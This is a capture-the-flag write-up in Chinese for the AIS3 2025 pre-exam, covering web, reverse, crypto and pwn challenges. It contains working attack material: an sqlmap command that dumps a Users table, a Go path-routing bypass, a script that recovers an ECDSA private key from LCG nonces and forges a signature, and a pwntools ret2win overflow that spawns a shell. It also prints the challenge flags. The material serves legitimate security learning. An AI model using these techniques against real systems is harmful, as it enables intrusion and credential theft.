AIS3 2025 pre-exam Writeup#

Web#

[100]Tomorin db 🐧#

首先看一下source code:

1
<!doctype html>
2
<meta name="viewport" content="width=device-width">
3
<pre>
4
<a href="cute.jpg">cute.jpg</a>
5
<a href="flag">flag</a>
6
<a href="is.jpg">is.jpg</a>
7
<a href="tomorin.jpg">tomorin.jpg</a>
8
</pre>

1
package main
2

3
import "net/http"
4

5
func main() {
6
  http.Handle("/", http.FileServer(http.Dir("/app/Tomorin")))
7
  http.HandleFunc("/flag", func(w http.ResponseWriter, r *http.Request) {
8
    http.Redirect(w, r, "https://youtu.be/lQuWN0biOBU?si=SijTXQCn9V3j4Rl6", http.StatusFound)
9
    })
10
    http.ListenAndServe(":30000", nil)
11
}

這題考點屬於 Web 路由繞過（Routing Bypass），可以利用 .%2Fflag 成功繞過 /flag 的 redirect handler，直接讀取靜態檔案 /app/Tomorin/flag。而其他像 .//flag 則會被導向，只有 .%2Fflag 有效，是因為它繞過了 Go 標準路由與 path 正規化的判斷。

[100]Login Screen 1#

有一個登入介面，登入後可以輸入2FA code如果以admin登入且2fa正確，就可以拿到flag。

1
<?php
2
include("init.php");
3

4
// if already logged in, redirect to dashboard
5
if (isset($_SESSION['username'])) {
6
    header('Location: dashboard.php');
7
    die();
8
}
9

10
// Handle form submission (both login and registration)
11
if ($_SERVER['REQUEST_METHOD'] == 'POST') {
12
    $username = $_POST['username'];
13
    $password = $_POST['password'];
14

15
    // Validation: Ensure both fields are filled
16
    if (empty($username) || empty($password)) {
17
        echo "Please enter both username and password.";
18
    } else {
19
        // Check if the username already exists
20
        $stmt = $db->prepare("SELECT * FROM Users WHERE username = '$username'");
21
        $result = $stmt->execute();
22
        $user = $result->fetchArray();
23

24
        if ($user) {
25
            // If user exists, login logic (verify password)
26
            if (password_verify($password, $user['password'])) {
27
                // Start session for the user
28
                $_SESSION['username'] = $username;
29
                $_SESSION['verified'] = 0; // Set verified to 0
30

31
                // redirect to dashboard
32
                header('Location: 2fa.php');
33
                die();
34
            } else {
35
                die("Invalid username or password.");
36
            }
37
        } else {
38
            // If user does not exist,
39
            die("Invalid username or password.");
40
        }
41
    }
42
}
43
?>

我們可以看到雖然使用了prepare()函數嘗試防SQLI，但沒有被正確使用，導致$username 被直接插入字串中，接下來就用sqlmap下去炸users表。

1
sqlmap -u "http://login-screen.ctftime.uk:36368/index.php" \
2
--cookie="PHPSESSID=0989e32287dcbac0bc452506b6c33abe" \
3
--data="username=admin&password=1234" \
4
--batch -p username -D main -T Users --dump --threads=5

螢幕擷取畫面 2025-05-24 201314 接下來登入就可以拿到flag

Misc#

[100] Ramen CTF#

題目描述:

1
我在吃 CTF，喔不對，拉麵，但我忘記我在哪間店吃了．．．，請幫我找出來
2
(P.S. FlagFormat: AIS3{google map 上的店家名稱:我點的品項在菜單上的名稱})
3
Author: whale120

掃發票QRcode，然後丟到財政部去找餐廳跟餐點。

[100] Welcome#

直接送，照上面打。

[100] AIS3 Tiny Server - Web / Misc#

題目敘述:

1
From 7890/tiny-web-server
2

3
I am reading Computer Systems: A Programmer's Perspective.
4

5
It teachers me how to write a tiny web server in C.
6

7
Non-features
8

9
No security check
10
The flag is at /readable_flag_somerandomstring (root directory of the server). You need to find out the flag name by yourself.
11

12
The challenge binary is the same across all AIS3 Tiny Server challenges.
13

14
Note: This is a misc (or web) challenge. Do not reverse the binary. It is for local testing only. Run ./tiny -h to see the help message. You may need to install gcc-multilib to run the binary.
15

16
Note 2: Do not use scanning tools. You don't need to scan directory.
17

18
Challenge Instancer
19

20
Warning: Instancer is not a part of the challenge, please do not attack it.
21

22
Please solve this challenge locally first then run your solver on the remote instance.
23

24
Author: pwn2ooown

簡單來說，就是想辦法能在本機上訪問到根目錄後，去遠端連線就好 PS:這題跟Tomorin db有一樣解法

1
AIS3{tInY_We8_seRVER_witH_FIl3_Br0Ws1ng_@S_@_Fe4TUrE}

Reverse#

[100] AIS3 Tiny Server - Reverse#

題目敘述:

1
Find the secret flag checker in the server binary itself and recover the flag.
2

3
The challenge binary is the same across all AIS3 Tiny Server challenges.
4

5
Please download the binary from the "AIS3 Tiny Server - Web / Misc" challenge.
6

7
This challenge doesn't depend on the "AIS3 Tiny Server - Pwn" and can be solved independently.
8

9
It is recommended to solve this challenge locally.
10

11
Author: pwn2ooown

看一下關鍵code:

1
  if ( sub_1E20(p_s) )
2
    sub_1F90(fd, 200, "Flag Correct!", "Congratulations! You found the correct flag!", 0);
3
  else
4
    sub_1F90(fd, 403, "Wrong Flag", "Sorry, that's not the correct flag. Try again!", 0);
5
  return close(fd);
6
}

1
_BOOL4 __cdecl sub_1E20(int a1)
2
{
3
  unsigned int index; // ecx
4
  char v2; // si
5
  char v3; // al
6
  int i; // eax
7
  char v5; // dl
8
  _BYTE key[10]; // [esp+7h] [ebp-49h] BYREF
9
  _DWORD enc[11]; // [esp+12h] [ebp-3Eh]
10
  __int16 v9; // [esp+3Eh] [ebp-12h]
11

12
  index = 0;
13
  v2 = 51;
14
  v9 = 20;
15
  v3 = 'r';
16
  enc[0] = 1480073267;
17
  enc[1] = 1197221906;
18
  enc[2] = 254628393;
19
  enc[3] = 920154;
20
  enc[4] = 1343445007;
21
  enc[5] = 874076697;
22
  enc[6] = 1127428440;
23
  enc[7] = 1510228243;
24
  enc[8] = 743978009;
25
  enc[9] = 54940467;
26
  enc[10] = 1246382110;
27
  qmemcpy(key, "rikki_l0v3", sizeof(key));
28
  while ( 1 )
29
  {
30
    *(enc + index++) = v2 ^ v3;
31
    if ( index == 45 )
32
      break;
33
    v2 = *(enc + index);
34
    v3 = key[index % 0xA];
35
  }
36
  for ( i = 0; i != 45; ++i )    //檢查長度為 45
37
  {
38
    v5 = *(a1 + i);
39
    if ( !v5 || v5 != *(enc + i) )    //每個字元都要完全相符
40
      return 0;
41
  }
42
  return *(a1 + 45) == 0;    //最後是 null (\0) 結尾
43
}

逆出來就一目了然，接著照他邏輯寫exp.py就好

1
v8_values = [
2
    1480073267,
3
    1197221906,
4
    254628393,
5
    920154,
6
    1343445007,
7
    874076697,
8
    1127428440,
9
    1510228243,
10
    743978009,
11
    54940467,
12
    1246382110
13
]
14

15
v8_bytes = bytearray()
16
for value in v8_values:
17
    v8_bytes.extend(value.to_bytes(4, byteorder='little'))
18

19
v8_bytes.append(0x14)
20

21
original_bytes = bytearray(v8_bytes)
22
processed_bytes = bytearray(45)
23

24
key = b"rikki_l0v3"
25

26
index = 0
27
v2 = 0x33
28
v3 = key[0]
29

30
while True:
31
    processed_bytes[index] = v2 ^ v3
32
    index += 1
33
    if index >= 45:
34
        break
35
    v2 = original_bytes[index]
36
    v3 = key[index % 10]
37

38
flag = processed_bytes.decode('latin-1')
39
print("AIS3-Flag:", flag)
40
#AIS3-Flag: AIS3{w0w_a_f1ag_check3r_1n_serv3r_1s_c00l!!!}

[100] web flag checker#

訪問 http://chals1.ais3.org:29998/會載入一個簡單的 HTML 頁面，並引入index.js和index.wasm頁面有一個輸入欄位與按鈕。我們的目標是找出輸入哪一組 flag 才能通過驗證。

打開 index.js 可以觀察到 JavaScript 透過 fetch(‘index.wasm’) 載入 WebAssembly 模組並執行檢查：

1
const val = document.getElementById('flagInput').value;
2
stringToUTF8(val, $0, 64);

代表使用者輸入的 flag 會寫入 WebAssembly 記憶體的某個位址，接著會由WebAssembly模組進行檢查。

使用 wabt 的 wasm2wat 工具可以還原：wasm2wat index.wasm -o index.wat

在 .wat 檔案中，可以找到核心驗證函數，例如：

1
(func $flagchecker (param $ptr i32) (result i32)
2
  ;; 對輸入進行操作
3
)

進一步追蹤編譯後的 C 對應程式碼，可發現輸入會被分成有大量 i64.const 或 i64.store 的片段，透過輪轉（rotate_left) 與記憶體常數做比對，然後嘗試逆著推回來。

1
// 取出輸入的 64-bit 值，做左旋轉後比對
2
rotated_input = rotate_left(*(input_ptr + offset), shift);
3
if (rotated_input != *(memory + const_offset)) return 0;

AIS3{W4SM_R3v3rsing_w17h_g0_4pp_39229dd}

[100] A_simple_snake_game#

題目敘述:

1
Here is A very interesting Snake game. If no one beat this game the world will be destory in 30 seconds. Now, Chenallger , It's your duty to beat the game, save the world.
2

3
author: Aukro

這題我花超多時間在解，其實題目不難，就是沒有抓到正確方向，以下是我所嘗試過的方向，對應到題目說的beat the game:

1.patch掉wall、border 2.patch掉死亡變成無敵模式 3.讓蛇身變超大可以輕易玩完遊戲 4.patch掉分數 5.撐超過題目說的30 seconds

但最後其實發現在drawText()可以發現有個奇怪條件，patch再跑就getflag了 https://github.com/jcalvarezj/snake/blob/master/Snake.cpp 這邊我還有找到題目原碼，就不放反編譯了

Crypto#

[100] Stream#

source code:

1
from random import getrandbits
2
import os
3
from hashlib import sha512
4
from flag import flag
5

6
def hexor(a: bytes, b: int):
7
    return hex(int.from_bytes(a)^b**2)
8

9
for i in range(80):
10
    print(hexor(sha512(os.urandom(True)).digest(), getrandbits(256)))
11

12
print(hexor(flag, getrandbits(256)))

看到題目我原本想說可以利用MT19937的624組樣本來預測下一組隨機值，但發現只會給80組，原本到這邊就卡住了，但後來去google知道624組指的是32-bits 而題目給的是256bits，所以每個hex其實是有8個32-bits，8*80=640，超過624即符合條件，接下來原本想去github挖好用的MT19937 solver code但都找不到，就用AI生架構跟AI+人工debug。exp如下:

1
import sys, math, hashlib, random
2

3
hex_list = [
4
    # 80組 enc_random_hex
5
    # 1組 enc_flag_hex
6
]
7

8
def recover_flag_from_hex_lines(hex_lines):
9
    cipher = hex_lines[-1]
10
    decoys = hex_lines[:-1]
11

12
    digest_ints = [int.from_bytes(hashlib.sha512(bytes([i])).digest(), 'big') for i in range(256)]
13

14
    random_outputs = []
15
    for val in decoys:
16
        for b in range(256):
17
            candidate = val ^ digest_ints[b]
18
            root = math.isqrt(candidate)
19
            if root * root == candidate and root.bit_length() <= 256:
20
                random_outputs.append(root)
21
                break
22
        else:
23
            raise ValueError("error")
24

25
    mt_outputs = []
26
    for r in random_outputs:
27
        for i in range(8):
28
            mt_outputs.append((r >> (32 * i)) & 0xFFFFFFFF)
29

30
    MASK_B = 0x9D2C5680
31
    MASK_C = 0xEFC60000
32

33
    def unshift_right(value, shift):
34
        result = value
35
        for _ in range(5):
36
            result = value ^ (result >> shift)
37
        return result & 0xFFFFFFFF
38

39
    def unshift_left(value, shift, mask):
40
        result = value
41
        for _ in range(5):
42
            result = value ^ ((result << shift) & mask)
43
        return result & 0xFFFFFFFF
44

45
    state = []
46
    for y in mt_outputs[:624]:
47
        y = unshift_right(y, 18)
48
        y = unshift_left(y, 15, MASK_C)
49
        y = unshift_left(y, 7, MASK_B)
50
        y = unshift_right(y, 11)
51
        state.append(y)
52

53
    rng = random.Random()
54
    rng.setstate((3, tuple(state + [0]), None))
55

56
    for _ in range(80):
57
        rng.getrandbits(256)
58

59
    B = rng.getrandbits(256)
60

61
    flag_int = cipher ^ (B * B)
62
    flag_bytes = flag_int.to_bytes(64, 'big').rstrip(b"\x00")
63
    return flag_bytes.decode()
64

65
print("Recovered flag:", recover_flag_from_hex_lines(hex_list))
66
#AIS3{no_more_junks...plz}

[100] SlowECDSA#

source code:

1
#!/usr/bin/env python3
2

3
import hashlib, os
4
from ecdsa import SigningKey, VerifyingKey, NIST192p
5
from ecdsa.util import number_to_string, string_to_number
6
from Crypto.Util.number import getRandomRange
7
from flag import flag
8

9
FLAG = flag
10

11
class LCG:
12
    def __init__(self, seed, a, c, m):
13
        self.state = seed
14
        self.a = a
15
        self.c = c
16
        self.m = m
17

18
    def next(self):
19
        self.state = (self.a * self.state + self.c) % self.m
20
        return self.state
21

22
curve = NIST192p
23
sk = SigningKey.generate(curve=curve)
24
vk = sk.verifying_key
25
order = sk.curve.generator.order()
26

27
lcg = LCG(seed=int.from_bytes(os.urandom(24), 'big'), a=1103515245, c=12345, m=order)
28

29
def sign(msg: bytes):
30
    h = int.from_bytes(hashlib.sha1(msg).digest(), 'big') % order
31
    k = lcg.next()
32
    R = k * curve.generator
33
    r = R.x() % order
34
    s = (pow(k, -1, order) * (h + r * sk.privkey.secret_multiplier)) % order
35
    return r, s
36

37
def verify(msg: str, r: int, s: int):
38
    h = int.from_bytes(hashlib.sha1(msg.encode()).digest(), 'big') % order
39
    try:
40
        sig = number_to_string(r, order) + number_to_string(s, order)
41
        return vk.verify_digest(sig, hashlib.sha1(msg.encode()).digest())
42
    except:
43
        return False
44

45
example_msg = b"example_msg"
46
print("==============SlowECDSA===============")
47
print("Available options: get_example, verify")
48

49
while True:
50
    opt = input("Enter option: ").strip()
51

52
    if opt == "get_example":
53
        print(f"msg: {example_msg.decode()}")
54
        example_r, example_s = sign(example_msg)
55
        print(f"r: {hex(example_r)}")
56
        print(f"s: {hex(example_s)}")
57

58
    elif opt == "verify":
59
        msg = input("Enter message: ").strip()
60
        r = int(input("Enter r (hex): ").strip(), 16)
61
        s = int(input("Enter s (hex): ").strip(), 16)
62

63
        if verify(msg, r, s):
64
            if msg == "give_me_flag":
65
                print("✅ Correct signature! Here's your flag:")
66
                print(FLAG.decode())
67
            else:
68
                print("✔️ Signature valid, but not the target message.")
69
        else:
70
            print("❌ Invalid signature.")
71

72
    else:
73
        print("Unknown option. Try again.")

該題實作了一個基於橢圓曲線密碼學的數位簽名算法，但使用LCG來產生每次簽章用的隨機數k，這導致只要取得幾筆簽章樣本，就可以預測下一次簽章所使用的k進而推出使用者的私鑰d。

攻擊流程: 1.腳本利用 LCG Nonce 生成的漏洞來恢復伺服器的私鑰 (sk)，然後偽造對訊息 “give_me_flag” 的簽章。 2.根據 ECDSA 原理，把每組簽章轉換為k_i = a_i + b_i * sk mod n 3.用代數消元的方式，從連續的(k1, k2, k3, k4)中消去LCG的a、c，建立一個只含 sk 的二次方程式。 4.依序測試每個sk值，根據k1,k2,k3推出LCG的參數a、c，並驗證它們是否能正確算出k4。 5.找到a、c後利用LCG推測出下一個Nonce k5，然後使用已知的私鑰sk，對”give_me_flag”訊息製作合法簽章(r5, s5)。 6.送出”give_me_flag”和偽造的(r5, s5)。

1
#!/usr/bin/env python3
2
import socket
3
import hashlib
4

5
HOST = 'chals1.ais3.org'
6
PORT = 19000
7

8
# NIST P-192 曲線參數
9
p = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFEFFFFFFFFFFFFFFFF
10
n = 0xFFFFFFFFFFFFFFFFFFFFFFFF99DEF836146BC9B1B4D22831
11
a_curve = p - 3
12
b_curve = int('64210519E59C80E70FA7E9AB72243049FEB8DEECC146B9B1', 16)
13
Gx = int('188DA80EB03090F67CBF20EB43A18800F4FF0AFD82FF1012', 16)
14
Gy = int('07192B95FFC8DA78631011ED6B24CDD573F977A11E794811', 16)
15
G = (Gx, Gy)
16

17
def ec_add(P, Q):
18
    if P is None: return Q
19
    if Q is None: return P
20
    (x1, y1), (x2, y2) = P, Q
21
    if x1 == x2:
22
        if (y1 + y2) % p == 0: return None
23
        lam = (3 * x1 * x1 + a_curve) * pow(2 * y1, -1, p) % p
24
    else:
25
        lam = (y2 - y1) * pow(x2 - x1, -1, p) % p
26
    x3 = (lam * lam - x1 - x2) % p
27
    y3 = (lam * (x1 - x3) - y1) % p
28
    return (x3, y3)
29

30
def ec_mul(k, P):
31
    R = None
32
    while k:
33
        if k & 1:
34
            R = ec_add(R, P)
35
        P = ec_add(P, P)
36
        k >>= 1
37
    return R
38

39
def H(msg):
40
    return int(hashlib.sha1(msg.encode()).hexdigest(), 16) % n
41

42
def recv_until(s, pat):
43
    data = b""
44
    while True:
45
        chunk = s.recv(1024)
46
        if not chunk:
47
            break
48
        data += chunk
49
        if pat.encode() in data:
50
            break
51
    return data.decode(errors="ignore")
52

53
def send_line(s, line):
54
    s.send((line + "\n").encode())
55

56
def mod_sqrt(a, p):
57
    if a == 0: return 0
58
    if pow(a, (p - 1) // 2, p) != 1: return None
59
    q, s = p - 1, 0
60
    while q % 2 == 0:
61
        q //= 2; s += 1
62
    z = 2
63
    while pow(z, (p - 1) // 2, p) == 1:
64
        z += 1
65
    c = pow(z, q, p)
66
    r = pow(a, (q + 1) // 2, p)
67
    t = pow(a, q, p)
68
    m = s
69
    while t != 1:
70
        i, t2 = 1, pow(t, 2, p)
71
        while pow(t2, 2 ** (i - 1), p) != 1:
72
            i += 1
73
        b = pow(c, 2 ** (m - i - 1), p)
74
        m = i
75
        c = (b * b) % p
76
        t = (t * c) % p
77
        r = (r * b) % p
78
    return r
79

80
# 建立連線
81
s = socket.create_connection((HOST, PORT))
82
s.settimeout(2)
83

84
recv_until(s, "option:")
85

86
sigdata = []
87
for _ in range(4):
88
    send_line(s, "get_example")
89
    response = recv_until(s, "option:")
90
    lines = response.splitlines()
91
    r_line = next((l for l in lines if l.startswith("r:")), "")
92
    s_line = next((l for l in lines if l.startswith("s:")), "")
93
    r = int(r_line.split(":", 1)[1].strip(), 16)
94
    ss = int(s_line.split(":", 1)[1].strip(), 16)
95
    sigdata.append((H("example_msg"), r, ss))
96

97
# 解密流程
98
(h1, r1, s1), (h2, r2, s2), (h3, r3, s3), (h4, r4, s4) = sigdata
99
inv = lambda x: pow(x, -1, n)
100
a1 = (h1 * inv(s1)) % n; b1 = (r1 * inv(s1)) % n
101
a2 = (h2 * inv(s2)) % n; b2 = (r2 * inv(s2)) % n
102
a3 = (h3 * inv(s3)) % n; b3 = (r3 * inv(s3)) % n
103
a4 = (h4 * inv(s4)) % n; b4 = (r4 * inv(s4)) % n
104

105
e = (a3 - a2) % n; f = (b3 - b2) % n
106
g = (a3 - a1) % n; h_ = (b3 - b1) % n
107
i_ = (a2 - a1) % n; j_ = (b2 - b1) % n
108
k_ = (a2 - a4) % n; l_ = (b2 - b4) % n
109

110
A2 = (f * h_ + j_ * l_) % n
111
A1 = (e * h_ + f * g + i_ * l_ + j_ * k_) % n
112
A0 = (e * g + i_ * k_) % n
113

114
disc = (A1 * A1 - 4 * A2 * A0) % n
115
sqrt_disc = mod_sqrt(disc, n)
116
if sqrt_disc is None:
117
    print("[!] 無法開根號")
118
    exit()
119

120
x1 = (-A1 + sqrt_disc) * inv(2 * A2) % n
121
x2 = (-A1 - sqrt_disc) * inv(2 * A2) % n
122

123
priv_key = None
124
for x in [x1, x2]:
125
    k1 = (h1 + x * r1) * inv(s1) % n
126
    k2 = (h2 + x * r2) * inv(s2) % n
127
    k3 = (h3 + x * r3) * inv(s3) % n
128
    if (k2 - k1) == 0:
129
        continue
130
    a_lcg = (k3 - k2) * inv(k2 - k1) % n
131
    c_lcg = (k2 - a_lcg * k1) % n
132
    k4 = (h4 + x * r4) * inv(s4) % n
133
    if (a_lcg * k3 + c_lcg - k4) % n == 0:
134
        priv_key = x
135
        break
136

137
if priv_key is None:
138
    print("[x] 私鑰還原失敗")
139
    exit()
140

141
print(f"[+] 找到私鑰: {hex(priv_key)}")
142
print(f"[+] LCG 參數: a = {hex(a_lcg)}, c = {hex(c_lcg)}")
143

144
# 偽造簽章
145
k5 = (a_lcg * k4 + c_lcg) % n
146
h_flag = H("give_me_flag")
147
R = ec_mul(k5, G)
148
r5 = R[0] % n
149
s5 = (inv(k5) * (h_flag + priv_key * r5)) % n
150

151
print("[+] 偽造簽章成功:")
152
print(f"    r = {hex(r5)}")
153
print(f"    s = {hex(s5)}")
154

155
# 送出 verify
156
send_line(s, "verify")
157
recv_until(s, "message:")
158
send_line(s, "give_me_flag")
159
recv_until(s, "r (hex):")
160
send_line(s, hex(r5))
161
recv_until(s, "s (hex):")
162
send_line(s, hex(s5))
163

164
# 讀取結果
165
final_response = recv_until(s, "option:")
166
print("[+] 伺服器回應:")
167
print(final_response)
168

169
# 顯示 flag（如果有）
170
for line in final_response.splitlines():
171
    if "AIS3{" in line:
172
        print("[🎉] Flag:", line.strip())
173
#AIS3{Aff1n3_nounc3s_c@N_bE_broke_ezily...}

螢幕擷取畫面 2025-05-26 141358

Pwn#

[100]Welcome to the World of Ave Mujica🌙#

題目描述:

1
Flag 在 /flag，這題的 flag 有 Unicode 字元，請找到 flag 之後直接提交到平台上，如果因為一些玄學問題 CTFd 送不過請 base64 flag 出來用 CyberChef decode 應該就可以了
2

3
Instancer
4

5
請先在本地測試並確定能成功攻擊後再開 instance
6

7
若同時參加兩場比賽，輸入任意一個 CTFd 的 token 皆可啟動 instance
8

9
Instancer 並非題目的一部分，請勿攻擊 Instancer。發現問題請回報 admin
10

11
Author: pwn2ooown

source code:

1
int __fastcall main(int argc, const char **argv, const char **envp)
2
{
3
  _BYTE buf[143]; // [rsp+0h] [rbp-A0h] BYREF
4
  char s[8]; // [rsp+8Fh] [rbp-11h] BYREF
5
  unsigned __int8 int8; // [rsp+97h] [rbp-9h]
6
  char *v7; // [rsp+98h] [rbp-8h]
7

8
  setvbuf(stdin, 0, 2, 0);
9
  setvbuf(_bss_start, 0, 2, 0);
10
  printf("\x1B[2J\x1B[1;1H");
11
  printf("\x1B[31m");
12
  printf("%s", (const char *)banner);
13
  puts(&byte_402A78);
14
  puts(&byte_402AB8);
15
  fgets(s, 8, stdin);
16
  v7 = strchr(s, 10);
17
  if ( v7 )
18
    *v7 = 0;
19
  if ( strcmp(s, "yes") )
20
  {
21
    puts(&byte_402AE8);
22
    exit(1);
23
  }
24
  printf(&byte_402B20);
25
  int8 = read_int8();
26
  printf(&byte_402B41);
27
  read(0, buf, int8);
28
  return 0;
29
}

1
int Welcome_to_the_world_of_Ave_Mujica()
2
{
3
  puts(&s);
4
  puts(&byte_402990);
5
  puts(&byte_4029B4);
6
  puts(&byte_4029C3);
7
  puts(&byte_4029D2);
8
  puts(&byte_4029E1);
9
  puts(&byte_4029FC);
10
  puts(&byte_402A15);
11
  return execve("/bin/sh", 0, 0);
12
}

可以發現read_int8()可以輸入0~255的數字，但read(0,buf,int8)沒有檢查int8是否超過buf大小，所以可以利用這點ret2win。

1
from pwn import *
2

3
context.arch = 'amd64'
4
#context.log_level = 'debug'
5

6
welcome_addr = 0x401256
7

8
#p = process('./chal')
9
p=remote("chals1.ais3.org",60877)
10

11
p.sendlineafter(b"?", b"yes")
12

13
p.sendlineafter(b": ", b"-1")
14

15

16
payload = flat(
17
    b'A' * 168,
18
    welcome_addr
19
)
20

21
p.sendlineafter(b": ", payload)
22

23
p.interactive()
24
#AIS3{Ave Mujica🎭將奇蹟帶入日常中🛐(Fortuna💵💵💵)...Ave Mujica🎭為你獻上慈悲憐憫✝️(Lacrima😭🥲💦)..._ad15e425293ef05414d129082e0c9154}

最終解題#

螢幕擷取畫面 2025-05-26 170121